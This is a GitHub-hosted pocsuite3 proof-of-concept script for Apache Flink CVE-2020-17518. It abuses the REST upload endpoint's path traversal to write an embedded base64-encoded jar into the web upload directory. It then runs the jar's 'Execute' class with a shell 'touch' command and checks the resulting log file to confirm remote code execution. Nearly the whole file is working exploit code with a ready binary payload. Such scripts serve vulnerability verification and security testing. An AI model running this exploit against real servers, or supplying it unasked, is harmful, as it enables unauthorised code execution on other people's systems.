forked from hanc00l/some_pocsuite
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathflink-CVE-2020-17518_1.11.2_rce.py
92 lines (83 loc) · 5.23 KB
/
flink-CVE-2020-17518_1.11.2_rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import random
import base64
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
class TestPOC(POCBase):
vulID = ''
version = '1'
author = 'hancool'
vulDate = '2021-1-5'
createDate = '2021-1-12'
updateDate = '2021-1-12'
references = [
'https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518',
'https://nosec.org/home/detail/4639.html']
name = 'Apache Flink任意文件写入漏洞'
appPowerLink = 'https://github.com/apache/flink/commit/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4'
appName = 'Apache Flink'
appVersion = '1.5.1-1.11.2'
vulType = VUL_TYPE.ARBITRARY_FILE_READ
category = POC_CATEGORY.EXPLOITS
desc = '''
Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历和任意文件写入漏洞。
'''
samples = ['127.0.0.1']
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [8081]
for port in ports:
try:
#get flink web path
url_check = '{}://{}:{}/jobmanager/config'.format(pr.scheme, pr.hostname, port)
r_test = req.get(url_check, verify=False)
if r_test.status_code == 200:
m = re.findall(b'/tmp/flink-web-(.+?)"',r_test.content)
if not m:
continue
#upload jars
random_jars = '{}.jar'.format(random.randint(10000,100000))
flink_upload_pathfile = '/tmp/flink-web-{}/flink-web-upload/{}'.format(m[0].decode('utf-8'),random_jars)
upload_files = {'jarfile': (flink_upload_pathfile, base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA'))}
url_upload = '{}://{}:{}/jars/upload'.format(pr.scheme, pr.hostname, port)
r_upload = req.post(url_upload,files=upload_files,verify=False)
if r_upload.status_code != 400:
continue
# exeucte
random_log = 'flink--standalonesession-0-{}.log'.format(random.randint(10000,100000))
url_exeucte = '{}://{}:{}/jars/{}/run?entry-class=Execute&program-args="touch $FLINK_HOME/log/{}"'.format(
pr.scheme, pr.hostname, port,random_jars,random_log)
r_execute = req.post(url_exeucte, verify=False)
# check log exists:
if r_execute.status_code != 400:
continue
url_log_exist = '{}://{}:{}/jobmanager/logs/{}'.format(pr.scheme, pr.hostname, port,random_log)
r_exist = req.get(url_log_exist, verify=False)
if r_exist.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(
pr.hostname, port)
break
except:
raise
#pass
return self.parse_attack(result)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("not vulnerability")
return output
register_poc(TestPOC)